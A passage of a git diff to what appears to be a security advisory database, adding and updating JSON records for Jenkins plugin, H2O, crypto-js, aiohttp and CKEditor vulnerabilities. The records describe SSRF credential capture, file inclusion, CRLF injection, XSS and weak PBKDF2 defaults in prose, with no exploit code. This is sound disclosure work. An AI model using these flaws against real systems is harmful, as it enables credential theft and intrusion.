"https://nvd.nist.gov/vuln/detail/CVE-2023-41947" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:01:54Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json b/advisories/github-reviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json new file mode 100644 index 0000000000000..036eeb42546c5 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfg6-cj3j-rpv4", + "modified": "2024-01-30T23:19:45Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41941" + ], + "summary": "Missing permission check in Jenkins AWS CodeCommit Trigger Plugin allows enumerating credentials IDs", + "details": "A missing permission check in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of AWS credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41941" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(1)" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:45Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json b/advisories/github-reviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json new file mode 100644 index 0000000000000..bdfbd2be72b83 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qf42-f5vf-6w99", + "modified": "2024-01-30T23:01:31Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41945" + ], + "summary": "Disabled permissions granted by Jenkins Assembla Auth Plugin", + "details": "Jenkins Assembla Auth Plugin 1.14 and earlier does not verify that the permissions it grants are enabled, resulting in users with EDIT permissions to be granted Overall/Manage and Overall/SystemRead permissions, even if those permissions are disabled and should not be granted.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:assembla-auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41945" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3065" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:01:31Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json b/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json index 5f82dafd171cb..af3ff16ec6fed 100644 --- a/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json +++ b/advisories/github-reviewed/2023/09/GHSA-qqvq-6xgj-jw8g/GHSA-qqvq-6xgj-jw8g.json @@ -244,6 +244,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202310-04" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://stackdiary.com/google-discloses-a-webm-vp8-bug-tracked-as-cve-2023-5217/" diff --git a/advisories/github-reviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json b/advisories/github-reviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json new file mode 100644 index 0000000000000..0cb580a4d6851 --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r428-g373-m2h4", + "modified": "2024-01-30T23:19:34Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41943" + ], + "summary": "Missing permission check in Jenkins AWS CodeCommit Trigger Plugin ", + "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to clear the SQS queue.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-codecommit-trigger" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.0.12" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41943" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:19:34Z", + "nvd_published_at": "2023-09-06T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json b/advisories/github-reviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json new file mode 100644 index 0000000000000..4a7429baeceeb --- /dev/null +++ b/advisories/github-reviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrpg-c7c4-8mpx", + "modified": "2024-01-30T23:07:57Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41937" + ], + "summary": "SSRF vulnerability in Jenkins Bitbucket Push and Pull Request Plugin allows capturing credentials", + "details": "Jenkins Bitbucket Push and Pull Request Plugin 2.4.0 through 2.8.3 (both inclusive) trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.plugins:bitbucket-push-and-pull-request" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.8.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.8.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41937" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3165" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:07:57Z", + "nvd_published_at": "2023-09-06T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json b/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json index 4674e2be5664b..17ada8011d34b 100644 --- a/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json +++ b/advisories/github-reviewed/2023/10/GHSA-j6h5-ggv2-3rfv/GHSA-j6h5-ggv2-3rfv.json @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44764" }, + { + "type": "WEB", + "url": "https://documentation.concretecms.org/developers/introduction/version-history/923-release-notes" + }, { "type": "PACKAGE", "url": "https://github.com/concretecms/concretecms/" diff --git a/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json b/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json index b93ba9b153b42..b9e2e6ad4b7e7 100644 --- a/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json +++ b/advisories/github-reviewed/2023/10/GHSA-xwcq-pm8m-c4vf/GHSA-xwcq-pm8m-c4vf.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-xwcq-pm8m-c4vf", - "modified": "2023-11-27T21:30:52Z", + "modified": "2024-02-01T16:30:29Z", "published": "2023-10-25T21:15:52Z", "aliases": [ "CVE-2023-46233" ], "summary": "crypto-js PBKDF2 1,000 times weaker than specified in 1993 and 1.3M times weaker than current standard", - "details": "### Impact\n#### Summary\nCrypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and [at least 1,300,000 times weaker than current industry standard][OWASP PBKDF2 Cheatsheet]. This is because it both (1) defaults to [SHA1][SHA1 wiki], a cryptographic hash algorithm considered insecure [since at least 2005][Cryptanalysis of SHA-1] and (2) defaults to [one single iteration][one iteration src], a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to [preimage][preimage attack] and [collision][collision attack] attacks.\n\nPotential Impact:\n\n1. If used to protect passwords, the impact is high.\n2. If used to generate signatures, the impact is high.\n\nProbability / risk analysis / attack enumeration:\n\n1. [For at most $45,000][SHA1 is a Shambles], an attacker, given control of only the beginning of a crypto-js PBKDF2 input, can create a value which has _identical cryptographic signature_ to any chosen known value.\n4. Due to the [length extension attack] on SHA1, we can create a value that has identical signature to any _unknown_ value, provided it is prefixed by a known value. It does not matter if PBKDF2 applies '[salt][cryptographic salt]' or '[pepper][cryptographic pepper]' or any other secret unknown to the attacker. It will still create an identical signature.\n\n[cryptographic salt]: https://en.wikipedia.org/wiki/Salt_(cryptography) \"Salt (cryptography), Wikipedia\"\n[cryptographic pepper]: https://en.wikipedia.org/wiki/Pepper_(cryptography) \"Pepper (cryptography), Wikipedia\"\n[SHA1 wiki]: https://en.wikipedia.org/wiki/SHA-1 \"SHA-1, Wikipedia\"\n[Cryptanalysis of SHA-1]: https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html \"Cryptanalysis of SHA-1\"\n[one iteration src]: https://github.com/brix/crypto-js/blob/1da3dabf93f0a0435c47627d6f171ad25f452012/src/pbkdf2.js#L22-L26 \"crypto-js/src/pbkdf2.js lines 22-26\"\n[collision attack]: https://en.wikipedia.org/wiki/Hash_collision \"Collision Attack, Wikipedia\"\n[preimage attack]: https://en.wikipedia.org/wiki/Preimage_attack \"Preimage Attack, Wikipedia\"\n[SHA1 is a Shambles]: https://eprint.iacr.org/2020/014.pdf \"SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1\nand Application to the PGP Web of Trust, Gaëtan Leurent and Thomas Peyrin\"\n[Length Extension attack]: https://en.wikipedia.org/wiki/Length_extension_attack \"Length extension attack, Wikipedia\"\n\ncrypto-js has 10,642 public users [as displayed on NPM][crypto-js, NPM], today October 11th 2023. The number of transient dependents is likely several orders of magnitude higher.\n\nA very rough GitHub search[ shows 432 files][GitHub search: affected files] cross GitHub using PBKDF2 in crypto-js in Typescript or JavaScript, but not specifying any number of iterations.\n\n[OWASP PBKDF2 Cheatsheet]: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2 \"OWASP PBKDF2 Cheatsheet\"\n[crypto-js, NPM]: https://www.npmjs.com/package/crypto-js \"crypto-js on NPM\"\n[GitHub search: affected files]: https://github.com/search?q=%22crypto-js%22+AND+pbkdf2+AND+%28lang%3AJavaScript+OR+lang%3ATypeScript%29++NOT+%22iterations%22&type=code&p=2 \"GitHub search: crypto-js AND pbkdf2 AND (lang:JavaScript OR lang:TypeScript) NOT iterations\"\n\n#### Affected versions\nAll versions are impacted. This code has been the same since crypto-js was first created.\n\n#### Further Cryptanalysis\n\nThe issue here is especially egregious because the length extension attack makes useless any secret that might be appended to the plaintext before calculating its signature.\n\nConsider a scheme in which a secret is created for a user's username, and that secret is used to protect e.g. their passwords. Let's say that password is 'fake-password', and their username is 'example-username'.\n\nTo encrypt the user password via symmetric encryption we might do `encrypt(plaintext: 'fake-password', encryption_key: cryptojs.pbkdf2(value: 'example username' + salt_or_pepper))`. By this means, we would, in theory, create an `encryption_key` that can be determined from the public username, but which requires the secret `salt_or_pepper` to generate. This is a common scheme for protecting passwords, as exemplified in bcrypt & scrypt. Because the encryption key is symmetric, we can use this derived key to also decrypt the ciphertext.\n\nBecause of the length extension issue, if the attacker obtains (via attack 1), a collision with 'example username', the attacker _does not need to know_ `salt_or_pepper` to decrypt their account data, only their public username.\n\n### Description\n\nPBKDF2 is a key-derivation is a key-derivation function that is used for two main purposes: (1) to stretch or squash a variable length password's entropy into a fixed size for consumption by another cryptographic operation and (2) to reduce the chance of downstream operations recovering the password input (for example, for password storage).\n\nUnlike the modern [webcrypto](https://w3c.github.io/webcrypto/#pbkdf2-operations) standard, crypto-js does not throw an error when a number of iterations is not specified, and defaults to one single iteration. In the year 2000, when PBKDF2 was originally specified, the minimum number of iterations suggested was set at 1,000. Today, [OWASP recommends 1,300,000][OWASP PBKDF2 Cheatsheet]:\n\nhttps://github.com/brix/crypto-js/blob/4dcaa7afd08f48cd285463b8f9499cdb242605fa/src/pbkdf2.js#L22-L26\n\n### Patches\nNo available patch. The package is not maintained.\n\n### Workarounds\nConsult the [OWASP PBKDF2 Cheatsheet]. Configure to use SHA256 with at least 250,000 iterations.\n\n### Coordinated disclosure\nThis issue was simultaneously submitted to [crypto-js](https://github.com/brix/crypto-js) and [crypto-es](https://github.com/entronad/crypto-es) on the 23rd of October 2023.\n\n### Caveats\n\nThis issue was found in a security review that was _not_ scoped to crypto-js. This report is not an indication that crypto-js has undergone a formal security assessment by the author.\n\n", + "details": "### Impact\n#### Summary\nCrypto-js PBKDF2 is 1,000 times weaker than originally specified in 1993, and [at least 1,300,000 times weaker than current industry standard][OWASP PBKDF2 Cheatsheet]. This is because it both (1) defaults to [SHA1][SHA1 wiki], a cryptographic hash algorithm considered insecure [since at least 2005][Cryptanalysis of SHA-1] and (2) defaults to [one single iteration][one iteration src], a 'strength' or 'difficulty' value specified at 1,000 when specified in 1993. PBKDF2 relies on iteration count as a countermeasure to [preimage][preimage attack] and [collision][collision attack] attacks.\n\nPotential Impact:\n\n1. If used to protect passwords, the impact is high.\n2. If used to generate signatures, the impact is high.\n\nProbability / risk analysis / attack enumeration:\n\n1. [For at most $45,000][SHA1 is a Shambles], an attacker, given control of only the beginning of a crypto-js PBKDF2 input, can create a value which has _identical cryptographic signature_ to any chosen known value.\n4. Due to the [length extension attack] on SHA1, we can create a value that has identical signature to any _unknown_ value, provided it is prefixed by a known value. It does not matter if PBKDF2 applies '[salt][cryptographic salt]' or '[pepper][cryptographic pepper]' or any other secret unknown to the attacker. It will still create an identical signature.\n\nUpdate: PBKDF2 requires a pseudo-random function that takes two inputs, so HMAC-SHA1 is used rather than plain SHA1. HMAC is not affected by [length extension attacks][Length Extension attack]. However, by defaulting to a single PBKDF2 iteration, the hashes do not benefit from the extra computational complexity that PBKDF2 is supposed to provide. The resulting hashes therefore have little protection against an offline brute-force attack.\n \n[cryptographic salt]: https://en.wikipedia.org/wiki/Salt_(cryptography) \"Salt (cryptography), Wikipedia\"\n[cryptographic pepper]: https://en.wikipedia.org/wiki/Pepper_(cryptography) \"Pepper (cryptography), Wikipedia\"\n[SHA1 wiki]: https://en.wikipedia.org/wiki/SHA-1 \"SHA-1, Wikipedia\"\n[Cryptanalysis of SHA-1]: https://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html \"Cryptanalysis of SHA-1\"\n[one iteration src]: https://github.com/brix/crypto-js/blob/1da3dabf93f0a0435c47627d6f171ad25f452012/src/pbkdf2.js#L22-L26 \"crypto-js/src/pbkdf2.js lines 22-26\"\n[collision attack]: https://en.wikipedia.org/wiki/Hash_collision \"Collision Attack, Wikipedia\"\n[preimage attack]: https://en.wikipedia.org/wiki/Preimage_attack \"Preimage Attack, Wikipedia\"\n[SHA1 is a Shambles]: https://eprint.iacr.org/2020/014.pdf \"SHA-1 is a Shambles: First Chosen-Prefix Collision on SHA-1\nand Application to the PGP Web of Trust, Gaëtan Leurent and Thomas Peyrin\"\n[Length Extension attack]: https://en.wikipedia.org/wiki/Length_extension_attack \"Length extension attack, Wikipedia\"\n\ncrypto-js has 10,642 public users [as displayed on NPM][crypto-js, NPM], today October 11th 2023. The number of transient dependents is likely several orders of magnitude higher.\n\nA very rough GitHub search[ shows 432 files][GitHub search: affected files] cross GitHub using PBKDF2 in crypto-js in Typescript or JavaScript, but not specifying any number of iterations.\n\n[OWASP PBKDF2 Cheatsheet]: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html#pbkdf2 \"OWASP PBKDF2 Cheatsheet\"\n[crypto-js, NPM]: https://www.npmjs.com/package/crypto-js \"crypto-js on NPM\"\n[GitHub search: affected files]: https://github.com/search?q=%22crypto-js%22+AND+pbkdf2+AND+%28lang%3AJavaScript+OR+lang%3ATypeScript%29++NOT+%22iterations%22&type=code&p=2 \"GitHub search: crypto-js AND pbkdf2 AND (lang:JavaScript OR lang:TypeScript) NOT iterations\"\n\n#### Affected versions\nAll versions are impacted. This code has been the same since crypto-js was first created.\n\n#### Further Cryptanalysis\n\nThe issue here is especially egregious because the length extension attack makes useless any secret that might be appended to the plaintext before calculating its signature.\n\nConsider a scheme in which a secret is created for a user's username, and that secret is used to protect e.g. their passwords. Let's say that password is 'fake-password', and their username is 'example-username'.\n\nTo encrypt the user password via symmetric encryption we might do `encrypt(plaintext: 'fake-password', encryption_key: cryptojs.pbkdf2(value: 'example username' + salt_or_pepper))`. By this means, we would, in theory, create an `encryption_key` that can be determined from the public username, but which requires the secret `salt_or_pepper` to generate. This is a common scheme for protecting passwords, as exemplified in bcrypt & scrypt. Because the encryption key is symmetric, we can use this derived key to also decrypt the ciphertext.\n\nBecause of the length extension issue, if the attacker obtains (via attack 1), a collision with 'example username', the attacker _does not need to know_ `salt_or_pepper` to decrypt their account data, only their public username.\n\n### Description\n\nPBKDF2 is a key-derivation is a key-derivation function that is used for two main purposes: (1) to stretch or squash a variable length password's entropy into a fixed size for consumption by another cryptographic operation and (2) to reduce the chance of downstream operations recovering the password input (for example, for password storage).\n\nUnlike the modern [webcrypto](https://w3c.github.io/webcrypto/#pbkdf2-operations) standard, crypto-js does not throw an error when a number of iterations is not specified, and defaults to one single iteration. In the year 2000, when PBKDF2 was originally specified, the minimum number of iterations suggested was set at 1,000. Today, [OWASP recommends 1,300,000][OWASP PBKDF2 Cheatsheet]:\n\nhttps://github.com/brix/crypto-js/blob/4dcaa7afd08f48cd285463b8f9499cdb242605fa/src/pbkdf2.js#L22-L26\n\n### Patches\nNo available patch. The package is not maintained.\n\n### Workarounds\nConsult the [OWASP PBKDF2 Cheatsheet]. Configure to use SHA256 with at least 250,000 iterations.\n\n### Coordinated disclosure\nThis issue was simultaneously submitted to [crypto-js](https://github.com/brix/crypto-js) and [crypto-es](https://github.com/entronad/crypto-es) on the 23rd of October 2023.\n\n### Caveats\n\nThis issue was found in a security review that was _not_ scoped to crypto-js. This report is not an indication that crypto-js has undergone a formal security assessment by the author.\n\n", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json b/advisories/github-reviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json new file mode 100644 index 0000000000000..a5a201f0f26e4 --- /dev/null +++ b/advisories/github-reviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mv8-95x5-xcq9", + "modified": "2024-02-08T18:41:10Z", + "published": "2023-11-16T18:30:31Z", + "aliases": [ + "CVE-2023-6038" + ], + "summary": "H2O local file inclusion vulnerability", + "details": "An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "ai.h2o:h2o-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.40.0.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6038" + }, + { + "type": "PACKAGE", + "url": "https://github.com/h2oai/h2o-3" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-29", + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:41:10Z", + "nvd_published_at": "2023-11-16T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json b/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json index 9bc272e6477ff..f690b08fbd06f 100644 --- a/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json +++ b/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json @@ -60,6 +60,10 @@ "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2023-246.yaml" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FUSJVQ7OQ55RWL4XAX2F5EZ73N4ZSH6U/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VDKQ6HM3KNDU4OQI476ZWT4O7DMSIT35/" diff --git a/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json b/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json index 157c0734310cf..ce5542019d62d 100644 --- a/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json +++ b/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json @@ -1,13 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-hxjc-9j8v-v9pr", - "modified": "2023-11-16T21:02:40Z", + "modified": "2024-02-07T18:20:22Z", "published": "2023-11-16T15:30:20Z", + "withdrawn": "2024-02-07T18:20:22Z", "aliases": [ - "CVE-2023-4771" + ], - "summary": "CKEditor Cross-site Scripting vulnerability", - "details": "A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /`ckeditor/samples/old/ajax.html` file and retrieve an authorized user's information.", + "summary": "Duplicate Advisory: CKEditor Cross-site Scripting vulnerability", + "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-wh5w-82f3-wrxh. This link is maintained to preserve external references.\n\n## Original Description\nA Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /`ckeditor/samples/old/ajax.html` file and retrieve an authorized user's information.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json b/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json index 4f92056515744..b5d63e57a9ebf 100644 --- a/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json +++ b/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json @@ -20,6 +20,12 @@ "ecosystem": "PyPI", "name": "cryptography" }, + "ecosystem_specific": { + "affected_functions": [ + "cryptography.hazmat.primitives.serialization.pkcs7.load_der_pkcs7_certificates", + "cryptography.hazmat.primitives.serialization.pkcs7.load_pem_pkcs7_certificates" + ] + }, "ranges": [ { "type": "ECOSYSTEM", diff --git a/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json b/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json index 56776e67cb25a..d904ffac36f44 100644 --- a/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json +++ b/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-q3qx-c6g2-7pw2", - "modified": "2023-11-30T15:27:39Z", + "modified": "2024-01-29T14:09:14Z", "published": "2023-11-27T23:17:42Z", "aliases": [ "CVE-2023-49081" ], "summary": "aiohttp's ClientSession is vulnerable to CRLF injection via version", - "details": "### Summary\nImproper validation make it possible for an attacker to modify the HTTP request (e.g. to insert a new header) or even create a new HTTP request if the attacker controls the HTTP version.\n\n### Details\nThe vulnerability only occurs if the attacker can control the HTTP version of the request (including its type).\nFor example if an unvalidated JSON value is used as a version and the attacker is then able to pass an array as the `version` parameter.\nFurthermore, the vulnerability only occurs when the `Connection` header is passed to the `headers` parameter.\n\nAt this point, the library will use the parsed value to create the request. If a list is passed, then it bypasses validation and it is possible to perform CRLF injection.\n\n### PoC\nThe POC below shows an example of providing an unvalidated array as a version:\nhttps://gist.github.com/jnovikov/184afb593d9c2114d77f508e0ccd508e\n\n### Impact\nCRLF injection leading to Request Smuggling.\n\n### Workaround\nIf these specific conditions are met and you are unable to upgrade, then validate the user input to the `version` parameter to ensure it is a `str`.", + "details": "### Summary\nImproper validation make it possible for an attacker to modify the HTTP request (e.g. to insert a new header) or even create a new HTTP request if the attacker controls the HTTP version.\n\n### Details\nThe vulnerability only occurs if the attacker can control the HTTP version of the request (including its type).\nFor example if an unvalidated JSON value is used as a version and the attacker is then able to pass an array as the `version` parameter.\nFurthermore, the vulnerability only occurs when the `Connection` header is passed to the `headers` parameter.\n\nAt this point, the library will use the parsed value to create the request. If a list is passed, then it bypasses validation and it is possible to perform CRLF injection.\n\n### PoC\nThe POC below shows an example of providing an unvalidated array as a version:\nhttps://gist.github.com/jnovikov/184afb593d9c2114d77f508e0ccd508e\n\n### Impact\nCRLF injection leading to Request Smuggling.\n\n### Workaround\nIf these specific conditions are met and you are unable to upgrade, then validate the user input to the `version` parameter to ensure it is a `str`.\n\nPatch: https://github.com/aio-libs/aiohttp/pull/7835/files", "severity": [ { "type": "CVSS_V3", @@ -44,6 +44,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49081" }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/7835/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/1e86b777e61cf4eefc7d92fa57fa19dcc676013b" + }, { "type": "WEB", "url": "https://gist.github.com/jnovikov/184afb593d9c2114d77f508e0ccd508e" @@ -52,6 +60,10 @@ "type": "PACKAGE", "url": "https://github.com/aio-libs/aiohttp" }, + { + "type": "WEB", + "url": 